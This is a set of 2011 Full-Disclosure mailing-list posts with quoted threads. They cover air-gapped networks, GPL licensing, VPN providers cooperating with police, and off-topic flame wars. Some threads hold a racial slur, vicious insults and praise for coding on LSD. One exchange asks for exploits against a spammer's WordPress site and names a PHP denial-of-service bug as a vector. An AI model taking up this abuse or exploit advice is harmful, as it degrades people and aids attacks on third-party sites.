By the way, to reply to a certain n3td3v... locating anything does not imply being clueless on what's going on, which seems to be their on-going issue. While at it, a reply to Thor, just to switch subjects for a bit; shield law doesn't apply when a journalist/reporter falsifies information to get low against the AA (in this case). Since the judge and the prosecuted are one and the same (the AA), I think it is a considerably dangerous situation to go against them. That's the only notch of credibility I'm giving to the article. A response from the AA could easily crush that trust. Cheers, Chris. On Mon, Oct 10, 2011 at 10:24 PM, Christian Sciberras uuf6...@gmail.comwrote: Well, I know a local datacenter (can't be more than 10 years old) makes use of a Faraday cage around it. And it doesn't really keep any mission-critical equipment, so I guess others out there do the same. Depending on the type of cage/shielding (don't know about the local one) it can completely block communications... On Mon, Oct 10, 2011 at 10:17 PM, Michael Schmidt mschm...@drugstore.comwrote: I have no idea, I assume – this is usually what they mean when they talk about an “air barrier” ** ** *From:* evejou [mailto:g...@techn0ev3.net] *Sent:* Monday, October 10, 2011 1:04 PM *To:* Michael Schmidt *Cc:* Thor (Hammer of God); Christian Sciberras; Michael T; full-disclosure@lists.grok.org.uk *Subject:* Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back” ** ** As someone kind of young (and thus no historical recollection), I'm kind of surprised that this is talked about in past-tense. Does this not happen anymore? I could see how this could get super annoying after awhile. ** ** ** ** On Mon, Oct 10, 2011 at 2:09 PM, Michael Schmidt mschm...@drugstore.com wrote: I know in the old days (15 years ago) – there were networks that were completely separate from the outside world. I remember trying to do telephone tech support to someone on a secure network… Tell him to do “this” He puts down the phone, goes through physical security, tries “this” He comes back though security picks up phone talks to me. Security allowed nothing that looked like portable storage in or out of the secure area. Rinse. Repeat. Couldn’t even place outside voice calls from the secure network area. I don’t know if they do this today. I also know that there used to be setups with removable hard drives where one drive connected you to the secure network and yet another drive connected to the unsecure network. – Two different network cards each enabled for different networks. The good old days *From:* full-disclosure-boun...@lists.grok.org.uk [mailto: full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Thor (Hammer of God) *Sent:* Monday, October 10, 2011 10:36 AM *To:* Christian Sciberras; Michael T *Cc:* full-disclosure@lists.grok.org.uk *Subject:* Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back” Consider the source. It’s “someone close” to the operations, and that only according to this guy. It could very well be a slot-puller in the casino across the street… I’m always dubious of the reporting of this type of thing where the source is some “secret” person, and where there is never any ability to refute claims. t *From:* full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Christian Sciberras *Sent:* Monday, October 10, 2011 7:05 AM *To:* Michael T *Cc:* full-disclosure@lists.grok.org.uk *Subject:* Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back” I'm talking more about their engineers than their network. If I had my network infected with a virus, I'd immediately deploy some form of logging/monitoring tool (eg, wireshark). Honestly, it all sounds like they're employing inexperienced engineers. Which is again strange, considering the field they're in. Regarding your bet, see that's already something. Why exactly can't they verify your bet? It isn't like viruses suddenly became invisible, is it?* *** I'm just curious to these questions. It's strange to hear someone saying we basically have no idea what's going on. On Mon, Oct 10, 2011 at 3:40 PM, Michael T mt2410...@gmail.com wrote:** ** It's a network that's 'detached', or 'segregated', or whatevered from the rest of the world, so it's 'largely immune to viruses'. That likely means they have: 1. NO logging 2. NO anti-virus 3. NO hardening The very fact that these systems are on a segregated network means they are probably more frail, and more susceptible to viruses, than a normal person's laptop. Immune to viruses... What a crock of shit. My bet
Re: [Full-disclosure] Wipe off, rub out, reappear...
Well, it SHOULDN'T happen to people that are supposedly trained to overcome such issues. It's like engineers are inexperienced prior to a nuclear reactor meltdown. While I wouldn't expect the engineers to have first-hand experience in dealing with such issues, it still doesn't excuse them from know what they're doing. On Mon, Oct 10, 2011 at 10:22 PM, Daniel Sichel dani...@ponderosatel.comwrote: Somebody posted the following; I'm just curious to these questions. It's strange to hear someone saying we basically have no idea what's going on. Doesn't sound funny to me, happens to me all the time. That's how I learn. Dan S. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
I'd expect someone with the brain size of a pea would at least rename variables in the code he claimed as his... Someone with more sense would probably write such a 50-liner from scratch... On Thu, Oct 6, 2011 at 4:01 PM, valdis.kletni...@vt.edu wrote: On Thu, 06 Oct 2011 00:34:00 -0300, root said: You don't have the faintest idea of how licencing works. You cannot slap a GPL v3 license to any software you see, much less erase the author's names. If you find a code in the internet without any license, you pretty much can't touch it, and must re-implement it completely. In particular, if code was written in a country that's a signatory to the Berne conventions, it's usually somewhere between very difficult and impossible to actually place a software work in the public domain - at least under US law, even putting an explicit This work is hereby placed in the public domain quite likely does *NOT* suffice - the only two clear ways to public domain in the US are expiration of the lifetime of the author plus 75 years copyright, and works for hire by a US federal government employee as part of his duties (so, for instance, NASA photographs are public domain - but photos of NASA activities taken by non-NASA photographers probably aren't). Also, smart programmers *don't* release their code into the public domain - that means that anybody can do anything with it. And that includes stealing it, using it to make tons of money, and then suing you if they discover a bug. The original reason for the BSD and X11 licenses was because you can't stick a hold harmless clause on something you public-domain. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OT Nigger - georgi+guninski+nigger+full-disclosure
But you're certainly growing it. Retard. On Thu, Oct 6, 2011 at 10:45 PM, xD 0x41 sec...@gmail.com wrote: umm.. idid not start this thread, nor many of the ones your actually replying to... have you even noticed this. fool. On 7 October 2011 07:04, Antony widmal antony.wid...@gmail.com wrote: Thing is, you bring shit, stupidity, troll on this mailing list. Most people here would agree. How about you start another shit/off-topic thread about Israel vs Palestinian this time ? Could be a fucking great topic on a IT sec mailing list. On Thu, Oct 6, 2011 at 3:53 PM, xD 0x41 sec...@gmail.com wrote: Oh, the brilliant one with nothing to offer... again. This list is getting worse, with or w/out me.. it only needs u and n3td3v and is perfect. yung. I make, i think, abit more than the avg McDonalds manager... so , you can dreamup your sick fantasies but, unfortunately the truth is truth. ciao bella. xd On 7 October 2011 06:44, Antony widmal antony.wid...@gmail.com wrote: Didn't know you could flip burgers and use your smartphone while working at Mc-Donald. On Thu, Oct 6, 2011 at 3:24 PM, xD 0x41 sec...@gmail.com wrote: “, the Indians were somewhat persecuted :) “ By that I take it you mean, systematic genocide? Where I grew up the school mascot (high school) was Benjamin Logan, an in(?)-famous Indian killer who not only murdered Indians, he wiped out entire villages massacring men, women and children in most of the villages in the area to eliminate the “native threat” for the white settlers. hehe i really dont know, and really, dont care... it is always some new and different views, so i just know from my school classes, indians were indeed hunted, and they also, fought back.. abit like aboriginals here.. but, this guy i think was high on ice or sumthin before he even spoke to me, he assumes i am now a racist :s I was saying, this country here in .au , is prolly the least one i could think of, as we have maybe 5 races alone in my street, maybe more, how could you fight your neighbor... abit like some countries ;) (iran/iraq , serbia/bosnia)...just gotup one day because told to, and took up arms, literally, against theyre neighbors... Thats happening now, and it is still called genocide.. That is life'... I aint young enough to join the army and make any difference. anyhow, i aint really into this race talk, and, dont want nothin todo with it, am no racist, simply not brought up to think badly of other people... this could happen, anywhere.. cheers xd On 7 October 2011 06:19, Csirt, Star s...@delta.com wrote: ** ** ** “, the Indians were somewhat persecuted :) “ ** ** By that I take it you mean, systematic genocide? Where I grew up the school mascot (high school) was Benjamin Logan, an in(?)-famous Indian killer who not only murdered Indians, he wiped out entire villages massacring men, women and children in most of the villages in the area to eliminate the “native threat” for the white settlers. ** ** ** ** ** ** -- *From:* full-disclosure-boun...@lists.grok.org.uk [mailto: full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *xD 0x41 *Sent:* Thursday, October 06, 2011 3:14 PM *To:* Sam Goody *Cc:* **full-disclosure@lists.grok.org.uk** *Subject:* Re: [Full-disclosure] OT Nigger - georgi+guninski+nigger+full-disclosure ** ** Do you know any history about the racism that the native Indians have experienced? haha yes yes they would be named Aboriginals, in USA , the Indians were somewhat persecuted :) get YOUR head out of YOUR arse idiot. xd On 7 October 2011 06:09, Sam Goody trashm...@hush.com wrote: You should really jump off a bridge. You always talk out of your ass including this one. How do you know there isn't racism in AU? How you ever been there? Do you know any history about the racism that the native Indians have experienced? Do you know about all other cultures that have had to endure racist laws in the AU? You have got no clue you piece of shit. Why don't you fucking get your head out of your ass. And what do you know about gangs? Are you now a gang expert? So gangs now inspire racism? Do you even know what racism means? You're a fucking failure you American piece of Shit. ** ** ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
In my eyes, a couple of offtopic messages is ok, but a train of several messages in less than an hour is what spam is... I must admit I was pissed off at that time, and the fact that some people failed to deal with such discussions appropriately only made it worse. Next time, launch your own thread for such discussions, so that people can easily manage/ignore what they don't need, instead of filling up legitimate threads with crap (imho). On Tue, Oct 4, 2011 at 11:27 AM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: Ok, well I suppose we can avoid spamming the list with our off topic ramblings and get back to the topic on hand (and behave like adults, which I assume all of you'se are), and clear up a few things up. VPN's and such can serve as a method to stop people on the local network from sniffing your connection (assuming a reliable encryption scheme is in place, and you have not been MITM-ed during the key exchange or whatever - crypto is NOT my interest!). However, we can reliably assume that the VPN provider can sniff your connection and compromise your safety per se, and that they WILL cooperate with Law Enforcement. Even running your own VPN (OpenVPN) on a VPS you purchase is still risky, as the VPS provider can simply take over the box. Etc. TL;DR, VPN's are not as safe as some believe for protecting ones anonymity. They WILL roll over for LEO and such. Not to mention threats on the LAN could compromise you, but I do not know much about how that works on the crypto side (however, if someone wants to enlighten me I would be grateful, it has piqued my curiosity!) Also, NOT surprised the provider rolled over in THAT case. *footnote for Christian, etc. I apologise for inciting a bit of off topic ranting, merely discussing morals, and how they affect people, and how often people do silly things when their logic/morality is compromised, often by narcotics and such. But that is for a discussion on morals and the psychology/sociology of cybercriminals. The ensuing debate about psychadelics and coding was probably my fault, but hey, people have varied interests, no? If we are going to act our age (adults, I presume) on this list at least display some tolerance for other peoples discussions, and keep the anger off the list. On Tue, Oct 4, 2011 at 8:06 AM, Ferenc Kovacs tyr...@gmail.com wrote: http://vpn.hidemyass.com/vpncontrol/legal.html VPN Data What we store: Time stamp and IP address when you connect and disconnect to our service. ... Legalities Anonymity services such as ours do not exist to hide people from illegal activity. We will cooperate with law enforcement agencies if it has become evident that your account has been used for illegal activities. people should read the TOC, AUP and privacy policy especially if they are planning to use that service for illegal activities. As I mentioned before it is hard to expect that a VPN provider will risk his company for your $11.52/month, and maybe they would try it for some lesser case, but what Lulsec did was grant, so I'm not surprised that they bent. On Tue, Oct 4, 2011 at 1:09 AM, xD 0x41 sec...@gmail.com wrote: maybe they are law abiding companies? :) Who were advertising themselves, and acting like they would NEVER do the dirty by handing over any payment records etc... wich is half the reason i believe the people use theose ones, advertising to protect you.. not to give your infos up, for really, no reason. as they did. Law abiding or not, then they should be advertising as a law abiding company, and not acting like some hackers-oparadise vpn service. xd On 4 October 2011 06:16, Ferenc Kovacs tyr...@gmail.com wrote: On Mon, Oct 3, 2011 at 10:35 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 10:42 AM, Antony widmal wrote: Using an external VPN provider to cover your trace clearly shows your incompetency and your idiot assumption. Trying to blame the VPN provider rather than accepting your mistake and learning from it clearly show your 3 years old mentality. Also, could you please stop posting as GLOW Xd as well ? We do not need your schizophrenic script kiddie lolololol, xD, hugs, spamming on this mailing list. You being on this mailing list is once again not the best idea. Thanks, Antony Actually XD and me are two different people. Second issues of privacy are always relevant, not understanding that law abiding individuals should always be concerned about companies that hand over personal info at the request of an authority figure are the ones with three year old mentalities. maybe they are law abiding companies? :) this whole fuss wouldn't have happened, if everybody could just stay a law abiding citizen. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter:
Re: [Full-disclosure] VPN providers and any providers in general...
Here's a great idea that doesn't need LSD or being doped;* shut the fuck up* . On Mon, Oct 3, 2011 at 6:31 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 7:30 AM, doc mombasa wrote: yeah ive been in similar situations several times unless the dose is too high then its doable hehehehe 2011/10/3 Darren Martyn d.martyn.fulldisclos...@gmail.com People used to LSD can do pretty amazing things. This guy in college was throwing a mini-rave/house party at his home, and he was tripping when the police came to ask us to turn the music down. He managed to talk to them for about 5 minutes, appeared totally fine, and they were none the wiser to his incredibly incapacitated condition. On Mon, Oct 3, 2011 at 3:16 PM, doc mombasa doc.momb...@gmail.comwrote: if you are used to the effects of LSD then its not a problem i like to code on psychedelics and/or alcohol myself :) 2011/10/3 Laurelai laure...@oneechan.org On 10/3/2011 7:10 AM, Darren Martyn wrote: Nothing wrong with it per se, I was known to enjoy large bottles of rum during extended coding sessions. Now I can attest to the massive fall-off in epic skillz associated with too much alcohol - my code starts OK, gets better, then becomes an epic mess of typoes. I stopped doing that a while back as I realized that it impaired my judgement too much. Computer crimes are far easier to commit when ones judgement is sufficiently impaired - a lot of people I used to associate with took some form of intoxicant and claimed it made them a better hacker. (cannabis often being one of the drugs of choice, some claim it allowed them to visualize it all better...). I personally reckon that the real reason for this is that it makes it easier to ignore the fact you are doing something wrong. TL;DR, intoxicants + misguided computer hackers = bad. On Mon, Oct 3, 2011 at 3:36 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 4:56 AM, Darren Martyn wrote: True, I know some hackers who really apply the Ballmers Peak (http://xkcd.com/323/) principle... They simply need to dry up :) Yeah i know quite a few of those myself. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ I know a guy who codes perl on LSD, writes good code too. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ The one time i coded under the influence it did not end well...never again lol... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
Manners, on FD list? Are you trying to be funny? On Mon, Oct 3, 2011 at 7:04 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 7:57 AM, Christian Sciberras wrote: Here's a great idea that doesn't need LSD or being doped;* shut the fuck up*. On Mon, Oct 3, 2011 at 6:31 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 7:30 AM, doc mombasa wrote: yeah ive been in similar situations several times unless the dose is too high then its doable hehehehe 2011/10/3 Darren Martyn d.martyn.fulldisclos...@gmail.com People used to LSD can do pretty amazing things. This guy in college was throwing a mini-rave/house party at his home, and he was tripping when the police came to ask us to turn the music down. He managed to talk to them for about 5 minutes, appeared totally fine, and they were none the wiser to his incredibly incapacitated condition. On Mon, Oct 3, 2011 at 3:16 PM, doc mombasa doc.momb...@gmail.comwrote: if you are used to the effects of LSD then its not a problem i like to code on psychedelics and/or alcohol myself :) 2011/10/3 Laurelai laure...@oneechan.org On 10/3/2011 7:10 AM, Darren Martyn wrote: Nothing wrong with it per se, I was known to enjoy large bottles of rum during extended coding sessions. Now I can attest to the massive fall-off in epic skillz associated with too much alcohol - my code starts OK, gets better, then becomes an epic mess of typoes. I stopped doing that a while back as I realized that it impaired my judgement too much. Computer crimes are far easier to commit when ones judgement is sufficiently impaired - a lot of people I used to associate with took some form of intoxicant and claimed it made them a better hacker. (cannabis often being one of the drugs of choice, some claim it allowed them to visualize it all better...). I personally reckon that the real reason for this is that it makes it easier to ignore the fact you are doing something wrong. TL;DR, intoxicants + misguided computer hackers = bad. On Mon, Oct 3, 2011 at 3:36 PM, Laurelai laure...@oneechan.orgwrote: On 10/3/2011 4:56 AM, Darren Martyn wrote: True, I know some hackers who really apply the Ballmers Peak (http://xkcd.com/323/) principle... They simply need to dry up :) Yeah i know quite a few of those myself. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ I know a guy who codes perl on LSD, writes good code too. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ The one time i coded under the influence it did not end well...never again lol... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ You are pretty rude guy, didn't your mom ever teach you manners? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
I'm not sure who's the the one acting like a child, the guy spamming people with bullshit or the other one telling him to do everyone a favor and shut up. On Mon, Oct 3, 2011 at 7:13 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 8:06 AM, Christian Sciberras wrote: Manners, on FD list? Are you trying to be funny? On Mon, Oct 3, 2011 at 7:04 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 7:57 AM, Christian Sciberras wrote: Here's a great idea that doesn't need LSD or being doped;* shut the fuck up*. On Mon, Oct 3, 2011 at 6:31 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 7:30 AM, doc mombasa wrote: yeah ive been in similar situations several times unless the dose is too high then its doable hehehehe 2011/10/3 Darren Martyn d.martyn.fulldisclos...@gmail.com People used to LSD can do pretty amazing things. This guy in college was throwing a mini-rave/house party at his home, and he was tripping when the police came to ask us to turn the music down. He managed to talk to them for about 5 minutes, appeared totally fine, and they were none the wiser to his incredibly incapacitated condition. On Mon, Oct 3, 2011 at 3:16 PM, doc mombasa doc.momb...@gmail.comwrote: if you are used to the effects of LSD then its not a problem i like to code on psychedelics and/or alcohol myself :) 2011/10/3 Laurelai laure...@oneechan.org On 10/3/2011 7:10 AM, Darren Martyn wrote: Nothing wrong with it per se, I was known to enjoy large bottles of rum during extended coding sessions. Now I can attest to the massive fall-off in epic skillz associated with too much alcohol - my code starts OK, gets better, then becomes an epic mess of typoes. I stopped doing that a while back as I realized that it impaired my judgement too much. Computer crimes are far easier to commit when ones judgement is sufficiently impaired - a lot of people I used to associate with took some form of intoxicant and claimed it made them a better hacker. (cannabis often being one of the drugs of choice, some claim it allowed them to visualize it all better...). I personally reckon that the real reason for this is that it makes it easier to ignore the fact you are doing something wrong. TL;DR, intoxicants + misguided computer hackers = bad. On Mon, Oct 3, 2011 at 3:36 PM, Laurelai laure...@oneechan.orgwrote: On 10/3/2011 4:56 AM, Darren Martyn wrote: True, I know some hackers who really apply the Ballmers Peak (http://xkcd.com/323/) principle... They simply need to dry up :) Yeah i know quite a few of those myself. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ I know a guy who codes perl on LSD, writes good code too. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ The one time i coded under the influence it did not end well...never again lol... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ You are pretty rude guy, didn't your mom ever teach you manners? Politeness goes a long long way no matter what sort of environment you are in. Screaming at people to shut up just makes you look like a child, if you dont like what i have to say dont listen to it. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
I know a guy who codes perl on LSD, writes good code too. That's as much useful as what is commonly found in toilets. Or if you prefer a better comparison, regular spam is more useful. Too bad your spam gets past Google filters. On Mon, Oct 3, 2011 at 7:21 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 8:16 AM, Christian Sciberras wrote: I'm not sure who's the the one acting like a child, the guy spamming people with bullshit or the other one telling him to do everyone a favor and shut up. On Mon, Oct 3, 2011 at 7:13 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 8:06 AM, Christian Sciberras wrote: Manners, on FD list? Are you trying to be funny? On Mon, Oct 3, 2011 at 7:04 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 7:57 AM, Christian Sciberras wrote: Here's a great idea that doesn't need LSD or being doped;* shut the fuck up*. On Mon, Oct 3, 2011 at 6:31 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 7:30 AM, doc mombasa wrote: yeah ive been in similar situations several times unless the dose is too high then its doable hehehehe 2011/10/3 Darren Martyn d.martyn.fulldisclos...@gmail.com People used to LSD can do pretty amazing things. This guy in college was throwing a mini-rave/house party at his home, and he was tripping when the police came to ask us to turn the music down. He managed to talk to them for about 5 minutes, appeared totally fine, and they were none the wiser to his incredibly incapacitated condition. On Mon, Oct 3, 2011 at 3:16 PM, doc mombasa doc.momb...@gmail.comwrote: if you are used to the effects of LSD then its not a problem i like to code on psychedelics and/or alcohol myself :) 2011/10/3 Laurelai laure...@oneechan.org On 10/3/2011 7:10 AM, Darren Martyn wrote: Nothing wrong with it per se, I was known to enjoy large bottles of rum during extended coding sessions. Now I can attest to the massive fall-off in epic skillz associated with too much alcohol - my code starts OK, gets better, then becomes an epic mess of typoes. I stopped doing that a while back as I realized that it impaired my judgement too much. Computer crimes are far easier to commit when ones judgement is sufficiently impaired - a lot of people I used to associate with took some form of intoxicant and claimed it made them a better hacker. (cannabis often being one of the drugs of choice, some claim it allowed them to visualize it all better...). I personally reckon that the real reason for this is that it makes it easier to ignore the fact you are doing something wrong. TL;DR, intoxicants + misguided computer hackers = bad. On Mon, Oct 3, 2011 at 3:36 PM, Laurelai laure...@oneechan.orgwrote: On 10/3/2011 4:56 AM, Darren Martyn wrote: True, I know some hackers who really apply the Ballmers Peak (http://xkcd.com/323/) principle... They simply need to dry up :) Yeah i know quite a few of those myself. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ I know a guy who codes perl on LSD, writes good code too. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ The one time i coded under the influence it did not end well...never again lol... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ You are pretty rude guy, didn't your mom ever teach you manners? Politeness goes a long long way no matter what sort of environment you are in. Screaming at people to shut up just makes you look like a child, if you dont like what i have to say dont listen to it. I was having a lovely conversation with people about the effects of intoxicants on coding skill until you came along*, again if you don't like the topic in question don't pay attention. * ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] http://www.bestcareersopportunities.com/
If it's connected to the Internet, it's already got an exploit ;) On Wed, Aug 31, 2011 at 12:26 PM, Ben McGinnes b...@adversary.org wrote: On 31/08/11 4:30 PM, Jacqui Caren-home wrote: is running wordpress 3.2.1 This lahore based spammer is running a PPC link blog and is pushing his crap all over the social networks right now and has just appeared in my work spamtraps from botnett'd systems. Anyone know if the above site has any known exploits? Note the hosting company has been notified, so expect any attacks/tests to be monitored. If they don't have the PHP floating point DOS attack workaround plug-in installed then that might be a vector. https://core.trac.wordpress.org/ticket/16097 http://www.exploringbinary.com/php-hangs-on-numeric-value-2-2250738585072011e-308/ It also depends on which version of PHP they're running and whether it's been fixed yet (it's a PHP bug rather than a WordPress one). Regards, Ben ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7
even better competing product and put us out of business and so on? That's exactly what Stallman was trying to prevent with the GPL. And the best part? He got the situation even worse. EOF On Wed, Aug 31, 2011 at 3:02 PM, valdis.kletni...@vt.edu wrote: On Wed, 31 Aug 2011 14:24:54 +1000, GloW - XD said: So basically once you sign over a GPL v2 , you sign over any right to misuse even the code wich you have written ? That is indeed the basic point of the GPL - once you release something under the GPL, everybody who receives a copy is free to use it for new and interesting purposes, *including ones you don't approve of*. Ever actually read the EULA on most commercial packages, where you end up agreeing to onerous terms like You agree to not badmouth our company in public and you agree to not reverse engineer our code in order to make an even better competing product and put us out of business and so on? That's exactly what Stallman was trying to prevent with the GPL. i guess i thought this could be scrutinized outside of the GPL via means of a solicitor but, if the law is complacent about use and misse then, i guess thats that and your correct, i have actually yes, used myself the CC lisence and was thinking the gpl was just a simpler version but seems that is Nope, it's not just a simpler version. The GPL has different goals than the various CC licenses. The CC tends to be very good at I took this photo, it is *mine*, and you're allowed to use it as long as you don't make money off it that should be mine, or claim that you took it. But that's because that was the CC goal. The GPL was expressly designed so that people could easily take GPL-licensed software, fork it, and improve it - but then be unable to take the fork closed-source the way you can with a BSD license. It makes a *lot* more sense if you don't think of the GPL as protecting *your* rights, but protecting the *software's* right to be free and open. (No, software doesn't have its own rights in the current legal system, but the logic is easier to follow if you think of it as if it *did* have rights). probably safer to go wityh CC i guess there atleast you have some say over mis-use in cases where you specify wich docunments in particular, ie: sourcecode1.cpp,source2.cpp and v.cpp must not be modified... the rest could be.., for example. Note that going that route has its own issues. For instance, if the person comes up with a really neat patch to foobar.cpp which speeds the program up by 400% by using a better algorithm, but it involves adding an extra parameter to a function call located in source2.cpp, he may be stuck. Even more importantly, if he finds a bug *in* source2.cpp, he may not be able to patch it because that would be a modification. It also doesn't address using source2.cpp *without* modification but for evil purposes. (At least it's not as thoroughly broken as the Gnu Free Documentation License's concept of invariant sections - consider something where the title page has been declared an invariant secton - or even better, the 'List of Changes in this version. Hilarity ensues ;) Also, there's actually a *range* of CC licenses, and it *is* possible to end up in a situation where you want to do a remix mash-up of 4 things, but two of them have incompatible licenses. For instance, if two both have share-alike, but one specifies commercial use and the other is non-commerical, you will have a really hard time distributing the result. Ohwell, that shoots any theory then of why it is even being mentioned in the list, other than to potentially harm all users of tightvnc src. Bingo. GPL violations potentially harm the users of the GPL'ed software who don't receive their rights (which include a right to the source code so they can fix/improve what you gave them). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x06
OK, let's take this in parts; 1. Here's a little secret. Life sucks no matter how you look at it. Now go cry in a corner, or try make something useful out of it. 2. Me, fame? You're kidding, right? 3. No I don't. I don't waste my time looking at Mr Esser (neither at anyone else, for the matter). 4. It remains that whatever you're calling art is simply attempts at fixing a problem of yours, (in an infantile manner if you ask me). 5. Huh? And I should care why exactly? Here's a crazy suggestion, stop spamming the list and go do something useful. Heck, at this point you even topped MustLive's stuff in uselessness. On Mon, Aug 8, 2011 at 8:39 PM, Herr E Balls mohsep.submissi...@googlemail.com wrote: Christian, How do you know how hard is life between studying for your CISSP exam for twelve years and getting rejected for being a mentor at Defcon Kids just because of that one time with the priests in Jaurez (and YES it was only once)? I don't think you do because if you did you would not be so off hand about my terrible half-strangled cries for some kind of acceptance from my peers? Why should be only people like you who get all the fame? The love? The tshirts? The twits. I WANT TOO Do you know, Christian how long you have to stare at Stefan Esser's face on Photoshop at 400% zoom before you wish that the nurses let you have sharp things? I do, Christian. It is 22 minutes. I timed it. Today. Then I try kill myself with my breakfast bowl. It no work. I have suffered for my art, Christian. And I am proud. That you should mock me for my pain is beyond me. I am a sad man. Also, well done in missing both the pop culture reference and Tavis' admittedly unexpected sense of humor. You now win at irony. Forever. On Mon, Aug 8, 2011 at 2:54 AM, Christian Sciberras uuf6...@gmail.comwrote: Don't kill his creativity. He's (cr|d)ying for some (self-presumed well-deserved) attention. On Sun, Aug 7, 2011 at 9:00 PM, Tavis Ormandy tav...@cmpxchg8b.com wrote: Herr E Balls mohsep.submissi...@googlemail.com wrote: Hi Guys! Edition six of MOHSEP is here with no technical issues (we hired mexican guy called manuel to run servers in latvia for us!). Link is here: http://mohsepblog.blogspot.com/2011/08/saturday-august-6th-2011.html I pity the fool who photoshopped me. -- - tav...@cmpxchg8b.com | pgp encrypted mail preferred --- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE handling the HTML notes incorrectly may lead to XSS attacks
